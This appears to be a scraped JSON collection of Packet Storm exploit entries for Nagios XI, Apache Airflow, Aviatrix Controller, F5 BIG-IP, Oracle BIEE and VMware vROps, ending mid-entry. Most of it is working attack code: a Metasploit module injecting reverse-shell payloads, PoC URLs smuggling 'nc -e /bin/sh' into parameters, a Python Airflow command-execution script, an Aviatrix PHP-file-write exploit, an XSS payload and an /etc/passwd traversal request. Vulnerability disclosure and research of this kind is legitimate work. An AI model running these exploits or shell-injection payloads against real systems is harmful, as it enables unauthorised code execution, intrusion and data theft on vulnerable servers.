\n'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ], \n'Targets' => [ \n[ \n'Linux (x86)', { \n'Arch' => [ ARCH_X86 ], \n'Platform' => 'linux', \n'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' } \n} \n], \n[ \n'Linux (x64)', { \n'Arch' => [ ARCH_X64 ], \n'Platform' => 'linux', \n'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } \n} \n], \n[ \n'CMD', { \n'Arch' => [ ARCH_CMD ], \n'Platform' => 'unix', \n# the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' } \n} \n] \n], \n'Privileged' => false, \n'DefaultTarget' => 2, \n'DisclosureDate' => '2021-02-13', \n'Notes' => { \n'Stability' => [ CRASH_SAFE ], \n'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], \n'Reliability' => [ REPEATABLE_SESSION ] \n} \n) \n) \n \nregister_options [ \nOptString.new('TARGET_CVE', [true, 'CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)', 'CVE-2021-25296']) \n] \nend \n \ndef username \ndatastore['USERNAME'] \nend \n \ndef password \ndatastore['PASSWORD'] \nend \n \ndef finish_install \ndatastore['FINISH_INSTALL'] \nend \n \n# Returns a status code an a error message on failure. \n# On success returns the status code and an array so we \n# can update the login_result and res_array variables appropriately. \ndef handle_unsigned_license(res_array, username, password, finish_install) \nauth_cookies, nsp = res_array \nsign_license_result = sign_license_agreement(auth_cookies, nsp) \nif sign_license_result \nreturn 5, 'Failed to sign license agreement' \nend \n \nprint_status('License agreement signed. The module will wait for 5 seconds and retry the login.') \nsleep 5 \nlogin_result, res_array = login_after_install_or_license(username, password, finish_install) \ncase login_result \nwhen 1..4 # An error occurred, propagate the error message \nreturn login_result, res_array[0] \nwhen 5 # The Nagios XI license agreement still has not been signed \nreturn 5, 'Failed to sign the license agreement.' \nend \n \nreturn login_result, res_array \nend \n \ndef authenticate \n# Use nagios_xi_login to try and authenticate. \nlogin_result, res_array = nagios_xi_login(username, password, finish_install) \ncase login_result \nwhen 1..3 # An error occurred, propagate the error message \nreturn login_result, res_array[0] \nwhen 4 # Nagios XI is not fully installed \ninstall_result = install_nagios_xi(password) \nif install_result # On installation failure, result is an array with the code and error message \nreturn install_result[0], install_result[1] \nend \n \nlogin_result, res_array = login_after_install_or_license(username, password, finish_install) \ncase login_result \nwhen 1..4 # An error occurred, propagate the error message \nreturn login_result, res_array[0] \nwhen 5 # The license agreement still needs to be signed \nlogin_result, res_array = handle_unsigned_license(res_array, username, password, finish_install) \nreturn login_result, res_array unless (login_result == 0) \nend \nwhen 5 # The license agreement still needs to be signed \nlogin_result, res_array = handle_unsigned_license(res_array, username, password, finish_install) \nreturn login_result, res_array unless (login_result == 0) \nend \n \nprint_good('Successfully authenticated to Nagios XI.') \n# Extract the authenticated cookies and nsp to use throughout the module \nif res_array.length == 2 \nauth_cookies = res_array[1] \nif auth_cookies && /nagiosxi=[a-z0-9]+;/.match(auth_cookies) \n@auth_cookies = auth_cookies \nelse \nreturn login_result, 'Failed to extract authentication cookies' \nend \nnsp = res_array[0].match(/nsp_str = \"([a-z0-9]+)/) \nif nsp \n@nsp = nsp[1] \nelse \nreturn login_result, 'Failed to extract nsp string' \nend \nelse \nreturn login_result, 'Failed to extract auth cookies and nsp string' \nend \n \n# Set the version here so both check and exploit can use it \nnagios_version = nagios_xi_version(res_array[0]) \nif nagios_version.nil? \nreturn 6, 'Unable to obtain the Nagios XI version from the dashboard' \nend \n \nprint_status(\"Target is Nagios XI with version #{nagios_version}.\") \n \n# Versions of NagiosXI pre-5.2 have different formats (5r1.0, 2014r2.7, 2012r2.8b, etc.) that Rex cannot handle, \n# so we set pre-5.2 versions to 1.0.0 for easier Rex comparison because the module only works on post-5.2 versions. \nif /^\\d{4}r\\d(?:\\.\\d)?(?:(?:RC\\d)|(?:[a-z]{1,3}))?$/.match(nagios_version) || nagios_version == '5r1.0' \nnagios_version = '1.0.0' \nend \n@version = Rex::Version.new(nagios_version) \n \nreturn 0, 'Successfully authenticated and retrieved NagiosXI Version.' \nend \n \ndef check \n# Authenticate to ensure we can access the NagiosXI version \nauth_result, err_msg = authenticate \ncase auth_result \nwhen 1 \nreturn CheckCode::Unknown(err_msg) \nwhen 2, 4, 5, 6 \nreturn CheckCode::Detected(err_msg) \nwhen 3 \nreturn CheckCode::Safe(err_msg) \nend \n \nif @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.7.5') \nreturn CheckCode::Appears \nend \n \nreturn CheckCode::Safe \nend \n \ndef execute_command(cmd, _opts = {}) \nif !@nsp || !@auth_cookies # Check to see if we already authenticated during the check \nauth_result, err_msg = authenticate \ncase auth_result \nwhen 1 \nfail_with(Failure::Disconnected, err_msg) \nwhen 2, 4, 5, 6 \nfail_with(Failure::UnexpectedReply, err_msg) \nwhen 3 \nfail_with(Failure::NotVulnerable, err_msg) \nend \nend \n \n# execute payload based on the selected targeted configuration wizard \nurl_params = { \n'update' => 1, \n'nsp' => @nsp \n} \n# After version 5.5.7, the URL parameter used in CVE-2021-25297 and CVE-2021-25298 \n# changes from address to ip_address \nif @version <= Rex::Version.new('5.5.7') \naddress_param = 'address' \nelse \naddress_param = 'ip_address' \nend \n \n# CVE-2021-25296 affects the windowswmi configuration wizard. \nif datastore['TARGET_CVE'] == 'CVE-2021-25296' \nurl_params = url_params.merge({ \n'nextstep' => 3, \n'wizard' => 'windowswmi', \n'ip_address' => Array.new(4) { rand(256) }.join('.'), \n'domain' => Rex::Text.rand_text_alphanumeric(7..15), \n'username' => Rex::Text.rand_text_alphanumeric(7..20), \n'password' => Rex::Text.rand_text_alphanumeric(7..20), \n'plugin_output_len' => Rex::Text.rand_text_numeric(5) + \"; #{cmd};\" \n}) \n# CVE-2021-25297 affects the switch configuration wizard. \nelsif datastore['TARGET_CVE'] == 'CVE-2021-25297' \nurl_params = url_params.merge({ \n'nextstep' => 3, \n'wizard' => 'switch', \naddress_param => Array.new(4) { rand(256) }.join('.') + \"\\\"; #{cmd};\", \n'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alphanumeric(7..15), \n'scaninterfaces' => 'on' \n}) \n# CVE-2021-25298 affects the cloud-vm configuration wizard, which we can access by \n# specifying the digitalocean option for the wizard parameter. \nelsif datastore['TARGET_CVE'] == 'CVE-2021-25298' \nurl_params = url_params.merge({ \naddress_param => Array.new(4) { rand(256) }.join('.') + \"; #{cmd};\", \n'nextstep' => 4, \n'wizard' => 'digitalocean' \n}) \nelse \nfail_with(Failure::BadConfig, 'Invalid TARGET_CVE: Choose CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298.') \nend \n \nprint_status('Sending the payload...') \n# Send the final request. Note that the target is not expected to respond if we get \n# code execution. Therefore, we set the timeout on this request to 0. \nsend_request_cgi({ \n'method' => 'GET', \n'uri' => '/nagiosxi/config/monitoringwizard.php', \n'cookie' => @auth_cookies, \n'vars_get' => url_params \n}) \nend \n \ndef exploit \nif target.arch.first == ARCH_CMD \nexecute_command(payload.encoded) \nelse \nexecute_cmdstager(background: true) \nend \nend \nend \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/170924/nagios_xi_configwizards_authenticated_rce.rb.txt"}, {"lastseen": "2021-02-26T16:40:53", "description": "", "cvss3": {}, "published": "2021-02-26T00:00:00", "type": "packetstorm", "title": "Nagios XI 5.7.5 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-25299"], "modified": "2021-02-26T00:00:00", "id": "PACKETSTORM:161561", "href": "https://packetstormsecurity.com/files/161561/Nagios-XI-5.7.5-Remote-Code-Execution.html", "sourceData": "`# nagios-xi-5.7.5-bugs \nBugs reported to Nagios XI \n \n \n## CVE-2021-25296 \n \n### Code Location \n \n`/usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php` \n \n### Code snippet \n \n```php \nif (!empty($plugin_output_len)) { \n$disk_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len; \n$service_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len; \n$process_wmi_command .= \" --forcetruncateoutput \" . $plugin_output_len; \n} \necho $disk_wmi_command; \n// Run the WMI plugin to get realtime info \nexec($disk_wmi_command, $disk_output, $disk_return_var); \nexec($service_wmi_command, $service_output, $service_return_var); \nexec($process_wmi_command, $process_output, $process_return_var); \n``` \n \n### POC (Works with admin/non-admin authentication) \n \n`https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=50c0f98fe9018dc43c81672ad1aeed5fd3f9710f013381519e553f846b5c2a86&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&plugin_output_len=&ip_address=127.0.0.1&domain=127.0.0.1&username=asdf&password=asdf&auth_file=&plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;&submitButton2=` \n \nThe `plugin_output_len` variable here is not sanitized and can give `command execution`. Eg: `plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;` \n \n \n## CVE-2021-25297 \n \n### Code Location \n \n`/usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php` \n \n### Code Snippet \n \n```php \nfunction switch_configwizard_add_cfg_to_mrtg($address) \n{ \n// get the data that we need \n$mrtg_confd_dir = \"/etc/mrtg/conf.d\"; \necho $address; \n$mrtg_cfg_file = \"{$address}.cfg\"; \n$absolute_mrtg_cfg_file = \"{$mrtg_confd_dir}/{$mrtg_cfg_file}\"; \n$cfgmaker_file = switch_configwizard_get_walk_file($address); \n// check if the file already exists for useful debugging \n$mrtg_confd_contents = scandir($mrtg_confd_dir); \necho \"REACHED HERE1\"; \nif (in_array($mrtg_cfg_file, $mrtg_confd_contents)) { \ndebug(\"{$mrtg_cfg_file} exists in {$mrtg_confd_dir}, overwriting\"); \n} else { \ndebug(\"{$mrtg_cfg_file} does not exist in {$mrtg_confd_dir}, creating\"); \n} \necho \"REACHED HERE2\"; \n// copy the cfgmaker file to the mrtg cfg destination \necho $cfgmaker_file; \necho $absolute_mrtg_cfg_file; \nif (!copy($cfgmaker_file, $absolute_mrtg_cfg_file)) { \ndebug(\"Unable to copy from {$cfgmaker_file} to {$absolute_mrtg_cfg_file}\"); \nreturn false; \n} \necho \"REACHED HERE3\"; \necho $absolute_mrtg_cfg_file; \n// add some meta info to the file \n$infoline = \"#### ADDED BY NAGIOSXI (User: \". get_user_attr(0, 'username') .\", DATE: \". get_datetime_string(time()) .\") ####\\n\"; \nexec(\"sed -i '1s|.*|{$infoline}&|' $absolute_mrtg_cfg_file\"); \n \nreturn true; \n} \n``` \n \n### POC (Works with admin/non-admin authentication) \n \n``` \nhttps://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=4e4f78ca5c24c7c526dc86b23092b81c3231a7bf59e1eb67f9918b8daf7b6de9&nextstep=3&wizard=switch&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=161&snmpversion=2c&snmpopts%5Bsnmpcommunity%5D=public&snmpopts%5Bv3_security_level%5D=authPriv&snmpopts%5Bv3_username%5D=&snmpopts%5Bv3_auth_password%5D=&snmpopts%5Bv3_auth_proto%5D=MD5&snmpopts%5Bv3_priv_password%5D=&snmpopts%5Bv3_priv_proto%5D=DES&portnames=number&scaninterfaces=on&bulk_fields%5B%5D=ip_address&bulk_fields%5B%5D=&bulk_fields%5B%5D=&bulk_options=&bulk_fields%5B%5D=&bulk_fields%5B%5D=&warn_speed_in_percent=50&crit_speed_in_percent=80&warn_speed_out_percent=50&crit_speed_out_percent=80&default_port_speed=100&submitButton2= \n``` \n \nThe `ip_address` variable here is not sanitized and can give `command execution`. Eg: `ip_address=1024; nc -e /bin/sh 127.0.0.1 4444;` \n \n \n## CVE-2021-25298 \n \n### Code path \n \n`/usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php` \n \n### Code Snippet \n \n```php \ncase CONFIGWIZARD_MODE_GETSTAGE2HTML: \n \n// echo (\"reached here ============================\"); \n// Get variables that were passed to us \n$address = grab_array_var($inargs, \"ip_address\", \"\"); // [User input] \n$port = grab_array_var($inargs, \"port\", \"\"); \n$token = grab_array_var($inargs, \"token\", \"\"); \n$no_ssl_verify = grab_array_var($inargs, \"no_ssl_verify\", 1); \n$hostname = grab_array_var($inargs, 'hostname', gethostbyaddr($address)); \n$default_mem_units = grab_array_var($inargs, 'default_mem_units', 'Gi'); \n$tcp_check_port = grab_array_var($inargs, 'tcp_check_port', '5693'); \n$rp_address = nagiosccm_replace_user_macros($address); \n$rp_port = nagiosccm_replace_user_macros($port); \n$rp_token = nagiosccm_replace_user_macros($token); \n$services_serial = grab_array_var($inargs, \"services_serial\", \"\"); \nif ($services_serial) { \n$services = unserialize(base64_decode($services_serial)); \n} \n// echo $rp_address; \n$not_used = array(); \n$return_code = 0; \n$alternative_host_check = false; \nexec('ping -W 2 -c 1 ' . $rp_address, $not_used, $return_code); // [Bug here] \n``` \n \n### POC (Works with admin/non-admin authentication) \n \n``` \nhttps://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=e2401df06a3892ba612df20e1ce2f559d7647c4b5fcba7f64c23c0ea9df1564f&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=5693&token=123&submitButton2= \n``` \n \nThe `ip_address` variable here is not sanitized and can give `command execution`. Eg: `ip_address=1024; nc -e /bin/sh 127.0.0.1 4444;` \n \n \n## CVE-2021-25299 \n \n### Code Location \n \n`/usr/local/nagiosxi/html/admin/sshterm.php` \n \n### Code Snippet \n \n```php+HTML \n<?php if ($efe) { ?> \n<iframe src=\"<?php echo $url; ?>\" style=\"width: 50%; min-width: 600px; height: 500px;\"></iframe> \n<?php } else { ?> \n<div style=\"color: #FFF; font-size: 14px; font-family: consolas, courier-new; background-color: #000; padding: 2px 6px; overflow-y: scroll; width: 50%; min-width: 600px; height: 500px;\">Enterprise features must be enabled</div> \n<?php \n} \n``` \n \n### POC \n \n`https://10.0.2.15/nagiosxi/admin/sshterm.php?url=javascript:alert(1)` \n \nThe `url` variable is not sanitized and can give `xss` . \n \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/161561/nagiosxi575-exec.txt"}, {"lastseen": "2021-06-02T13:48:44", "description": "", "cvss3": {}, "published": "2021-06-02T00:00:00", "type": "packetstorm", "title": "Apache Airflow 1.10.10 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11978", "CVE-2020-13927"], "modified": "2021-06-02T00:00:00", "id": "PACKETSTORM:162908", "href": "https://packetstormsecurity.com/files/162908/Apache-Airflow-1.10.10-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution \n# Date: 2021-06-02 \n# Exploit Author: Pepe Berba \n# Vendor Homepage: https://airflow.apache.org/ \n# Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html \n# Version: <= 1.10.10 \n# Tested on: Docker apache/airflow:1.10 .10 (https://github.com/pberba/CVE-2020-11978/blob/main/docker-compose.yml) \n# CVE : CVE-2020-11978 \n# \n# This is a proof of concept for CVE-2020-11978, a RCE vulnerability in one of the example DAGs shipped with airflow \n# This combines with CVE-2020-13927 where unauthenticated requests to Airflow's Experimental API were allowded by default. \n# Together, potentially allows unauthenticated RCE to Airflow \n# \n# Repo: https://github.com/pberba/CVE-2020-11978 \n# More information can be found here: \n# https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E \n# https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E \n# \n# Remediation: \n# For CVE-2020-13927 make sure that the config `[api]auth_backend = airflow.api.auth.backend.deny_all` or has auth set. \n# For CVE-2020-11978 use 1.10.11 or set `load_examples=False` when initializing Airflow. You can also manually delete example_trigger_target_dag DAG. \n# \n# Example usage: python CVE-2020-11978.py http://127.0.0.1:8080 \"touch test\" \n \nimport argparse \nimport requests \nimport sys \nimport time \n \ndef create_dag(url, cmd): \nprint('[+] Checking if Airflow Experimental REST API is accessible...') \ncheck = requests.get('{}/api/experimental/test'.format(url)) \n \nif check.status_code == 200: \nprint('[+] /api/experimental/test returned 200' ) \nelse: \nprint('[!] /api/experimental/test returned {}'.format(check.status_code)) \nprint('[!] Airflow Experimental REST API not be accessible') \nsys.exit(1) \n \ncheck_task = requests.get('{}/api/experimental/dags/example_trigger_target_dag/tasks/bash_task'.format(url)) \nif check_task.status_code != 200: \nprint('[!] Failed to find the example_trigger_target_dag.bash_task') \nprint('[!] Host isn\\'t vunerable to CVE-2020-11978') \nsys.exit(1) \nelif 'dag_run' in check_task.json()['env']: \nprint('[!] example_trigger_target_dag.bash_task is patched') \nprint('[!] Host isn\\'t vunerable to CVE-2020-11978') \nsys.exit(1) \nprint('[+] example_trigger_target_dag.bash_task is vulnerable') \n \nunpause = requests.get('{}/api/experimental/dags/example_trigger_target_dag/paused/false'.format(url)) \nif unpause.status_code != 200: \nprint('[!] Unable to enable example_trigger_target_dag. Example dags were not loaded') \nsys.exit(1) \nelse: \nprint('[+] example_trigger_target_dag was enabled') \n \nprint('[+] Creating new DAG...') \nres = requests.post( \n'{}/api/experimental/dags/example_trigger_target_dag/dag_runs'.format(url), \njson={ \n'conf': { \n'message': '\"; {} #'.format(cmd) \n} \n} \n) \n \nif res.status_code == 200: \nprint('[+] Successfully created DAG') \nprint('[+] \"{}\"'.format(res.json()['message'])) \nelse: \nprint('[!] Failed to create DAG') \nsys.exit(1) \n \nwait_url = '{url}/api/experimental/dags/example_trigger_target_dag/dag_runs/{execution_date}/tasks/bash_task'.format( \nurl = url, \nexecution_date=res.json()['execution_date'] \n) \n \nstart_time = time.time() \nprint('[.] Waiting for the scheduler to run the DAG... This might take a minute.') \nprint('[.] If the bash task is never queued, then the scheduler might not be running.') \nwhile True: \ntime.sleep(10) \nres = requests.get(wait_url) \nstatus = res.json()['state'] \nif status == 'queued': \nprint('[.] Bash task queued...') \nelif status == 'running': \nprint('[+] Bash task running...') \nelif status == 'success': \nprint('[+] Bash task successfully ran') \nbreak \nelif status == 'None': \nprint('[-] Bash task is not yet queued...'.format(status)) \nelse: \nprint('[!] Bash task was {}'.format(status)) \nsys.exit(1) \n \nreturn 0 \n \n \ndef main(): \narg_parser = argparse.ArgumentParser() \narg_parser.add_argument('url', type=str, help=\"Base URL for Airflow\") \narg_parser.add_argument('command', type=str) \nargs = arg_parser.parse_args() \n \ncreate_dag( \nargs.url, \nargs.command \n) \n \nif __name__ == '__main__': \nmain() \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/162908/apacheairflow11010-exec.txt"}, {"lastseen": "2021-10-11T14:33:21", "description": "", "cvss3": {}, "published": "2021-10-11T00:00:00", "type": "packetstorm", "title": "Aviatrix Controller 6.x Path Traversal / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-40870"], "modified": "2021-10-11T00:00:00", "id": "PACKETSTORM:164461", "href": "https://packetstormsecurity.com/files/164461/Aviatrix-Controller-6.x-Path-Traversal-Code-Execution.html", "sourceData": "`#!/usr/bin/env python3 \nimport requests \nfrom requests.structures import CaseInsensitiveDict \nfrom colorama import Fore, Style \nimport argparse \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nprint(f\"\"\" \n \n\u2591\u2588\u2580\u2580\u2588 \u2591\u2588\u2500\u2500\u2591\u2588 \u2591\u2588\u2580\u2580\u2580 \u2500\u2500 \u2588\u2580\u2588 \u2588\u2580\u2580\u2588 \u2588\u2580\u2588 \u2584\u2588\u2500 \u2500\u2500 \u2500\u2588\u2580\u2588\u2500 \u2588\u2580\u2580\u2588 \u2584\u2580\u2580\u2584 \u2584\u2580\u2580\u2584 \u2588\u2580\u2580\u2588 \n\u2591\u2588\u2500\u2500\u2500 \u2500\u2591\u2588\u2591\u2588\u2500 \u2591\u2588\u2580\u2580\u2580 \u2580\u2580 \u2500\u2584\u2580 \u2588\u2584\u2580\u2588 \u2500\u2584\u2580 \u2500\u2588\u2500 \u2580\u2580 \u2588\u2584\u2584\u2588\u2584 \u2588\u2584\u2580\u2588 \u2584\u2580\u2580\u2584 \u2588\u2584\u2584\u2500 \u2588\u2584\u2580\u2588 \n\u2591\u2588\u2584\u2584\u2588 \u2500\u2500\u2580\u2584\u2580\u2500 \u2591\u2588\u2584\u2584\u2584 \u2500\u2500 \u2588\u2584\u2584 \u2588\u2584\u2584\u2588 \u2588\u2584\u2584 \u2584\u2588\u2584 \u2500\u2500 \u2500\u2500\u2500\u2588\u2500 \u2588\u2584\u2584\u2588 \u2580\u2584\u2584\u2580 \u2580\u2584\u2584\u2580 \u2588\u2584\u2584\u2588 \nAuthor : 0xJoyGhosh \nOrg : System00 Security \nTwitter: @0xjoyghosh \n \n\"\"\") \ntry: \nparser = argparse.ArgumentParser() \nparser.add_argument(\"-u\", \"--url\", help=\"Enter Target Url With scheme Ex: -u https://avaitix.target.com\", type=str) \nparser.add_argument(\"-c\", \"--code\", help=\"Enter php code Ex: -c '<?php phpinfo(); ?>' \", type=str) \nparser.add_argument(\"-n\", \"--name\", help=\"Enter php code Ex: -n 'filename' \", type=str) \nargs = parser.parse_args() \nurl =f\"{args.url}/v1/backend1\" \nexcept TypeError: \nprint(\"Type -h To See all the options\") \nexcept(): \nexit() \ndef exploit(url,path,code): \nheaders = CaseInsensitiveDict() \nheaders[\"Content-Type\"] = \"application/x-www-form-urlencoded\" \ndata = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{path}.php&data={code}' \nresp = requests.post(url, headers=headers, data=data,verify=False) \nstat = requests.get(f\"{args.url}/v1/{path}\",verify=False) \nif resp.status_code==200: \nif stat.status_code==200: \nprint(f\"[ {Fore.RED} Exploited {Fore.BLACK}] [{Fore.GREEN}{args.url}/v1/{path}{Fore.BLACK} ]\") \nprint(\"\") \nelse: \nprint(\"[ Exploit successful Creating File Failed ]\") \npass \nelse: \nprint(f'[{Fore.BLUE} Exploit Unsuccessful {Fore.BLUE}]') \n \nif args.url is not None: \nif args.code is not None: \nif args.name is not None: \nexploit(url,args.name,args.code) \nelse: \nprint('Type -h to see help Menu') \nelse: \nprint('Type -h to see help Menu') \nelse: \nprint('Type -h to see help Menu') \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164461/CVE-2021-40870.py.txt"}, {"lastseen": "2021-03-11T15:12:56", "description": "", "cvss3": {}, "published": "2021-03-11T00:00:00", "type": "packetstorm", "title": "F5 Big IP TMM uri_normalize_host Information Disclosure / Out-Of-Bounds Write", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22991"], "modified": "2021-03-11T00:00:00", "id": "PACKETSTORM:161752", "href": "https://packetstormsecurity.com/files/161752/F5-Big-IP-TMM-uri_normalize_host-Information-Disclosure-Out-Of-Bounds-Write.html", "sourceData": "`F5 Big IP - TMM uri_normalize_host infoleak and out-of-bounds write \n \nBig IP's Traffic Management Microkernels (TMM) URI normalization incorrectly handles invalid IPv6 hostnames: \n \nWhen uri_normalize_host is called with a hostname of the form \\u\"[abcdef]\\u\", uri_norm_inet6 is called \nwith the substring abcdef as an argument. Pseudo code of this function is shown below: \n \nint uri_norm_inet6(char *inbuf, int64_t inlen, char *outbuf, _DWORD *outlen) { \nstruct in6_addr s; unsigned int ret; \n \nret = uri_inet6_pton(inbuf, inlen, &s); if ( !ret ) { \nif ( inet_ntop(AF_INET6, &s, outbuf, 46u) ) *outlen = strlen(outbuf); \nelse ret = 3; \n} return ret; \n} \n \nThe s hostname is first passed to uri_inet6_pton, which is responsible for parsing a text IPv6 \naddress and initializing the network address structure s. If the function doesn't return an error, \ninet_ntop is called to turn s back into a printable (and normalized) string. \n \nThe bug is that uri_inet6_pton incorrectly handles short hostnames. When a single hex character is \npassed to the function, it will only initialize the first two bytes of the in6_addr structure \nwithout returning an error. This means inet_ntop will now happily convert uninitialized stack memory \ninto a printable IPv6 hostname. \n \nWhile this could already be a security vulnerability if the normalized hostname becomes visible to \nthe attacker, it also breaks one of the core assumptions of callers of uri_normalize: Under normal \ncircumstances, a normalized URL should never be longer than 3*input_length + 2 (this handles the \nworst case scenario of URL encoding every character in the URL + adding slashes). This means callers \ncan just allocate an outbuf buffer with this size and the URI normalization functions do not have to \nperform any length checks. \n \nHowever, due to the described bug, the size invariant does not hold anymore leading to a \nstraightforward out-of-bound write. \n \nTMM's URI normalization is used in a number of places. Luckily most of them do not perform \nnormalization on the hostname allowing them to avoid this bug. \n \nHowever, there are a couple of configurations that can expose this bug to an attacker. (This list is \nbased on static analysis as I don't have a test environment where I can verify all variants) iRules \nor BIG-IP LTM policies that use the \\\"normalize URI\\\" config option URL categorization as part of APM, \nSWG or PEM Risk Classification \n \nProof of Concept: \n \nFor a server configured with the following iRule: \nwhen HTTP_REQUEST { \nlog local0. \\\"normalized: [HTTP::uri -normalized]\\\" \nlog local0. \\\"uri: [HTTP::uri]\\\" } \n \nSend a request like this: echo -e \\\"GET h://[f] HTTP/1.1\\\\ \n\\\\ \n\\\" | ncat --ssl 10.154.0.3 443 \n \nThis will log uninitialized memory to /var/log/ltm on the F5 host: \nDec 10 09:41:32 f5-16-vm info tmm[26669]: Rule /Common/normalized <HTTP_REQUEST>: normalized: h://[aa:cf01::c00:0:1100:0]/ \nDec 10 09:41:32 f5-16-vm info tmm[26669]: Rule /Common/normalized <HTTP_REQUEST>: uri: h://[aa] \n \nFor debug TMM's using `wrapped_umem_alloc` for heap allocations, it will also lead to a direct \ncrash of the TMM due to the heap buffer overflow. \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse, \nthe bug report will become visible to the public. The scheduled disclosure \ndate is 2021-03-10. Disclosure at an earlier date is also possible if \nagreed upon by all parties. \n \nCredit Information: \n \nFelix Wilhelm of Google Project Zero \n \nRelated CVE Numbers: CVE-2021-22991. \n \n \n \nFound by: fwilhelm@google.com \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161752/GS20210311143641.txt"}, {"lastseen": "2020-10-28T16:50:20", "description": "", "cvss3": {}, "published": "2020-10-28T00:00:00", "type": "packetstorm", "title": "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 LFI", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-14864"], "modified": "2020-10-28T00:00:00", "id": "PACKETSTORM:159748", "href": "https://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html", "sourceData": "`# Exploit Title: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion \n# Date: 2020-10-27 \n# Exploit Author: Ivo Palazzolo (@palaziv) \n# Reference: https://www.oracle.com/security-alerts/cpuoct2020.html \n# Vendor Homepage: https://www.oracle.com \n# Software Link: https://www.oracle.com/middleware/technologies/bi-enterprise-edition-downloads.html \n# Version: 5.5.0.0.0, 12.2.1.3.0, 12.2.1.4.0 \n# Tested on: SUSE Linux Enterprise Server \n# CVE: CVE-2020-14864 \n \n# Description \nA Directory Traversal vulnerability has been discovered in the 'getPreviewImage' function of Oracle Business Intelligence Enterprise Edition. The 'getPreviewImage' function is used to get a preview image of a previously uploaded theme logo. By manipulating the 'previewFilePath' URL parameter an attacker with access to the administration interface is able to read arbitrary system files. \n \n# PoC \nhttps://TARGET/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd \n`\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/159748/oraclebiee-traversallfi.txt"}, {"lastseen": "2021-04-27T15:49:39", "description": "", "cvss3": {}, "published": "2021-04-27T00:00:00", "type": "packetstorm", "title": "VMware vRealize Operations Manager Server-Side Request Forgery / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-04-27T00:00:00", "id": "PACKETSTORM:162349", "href": "https://packetstormsecurity.com/files/162349/VMware-vRealize-Operations-Manager-Server-Side-Request-Forgery-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE', 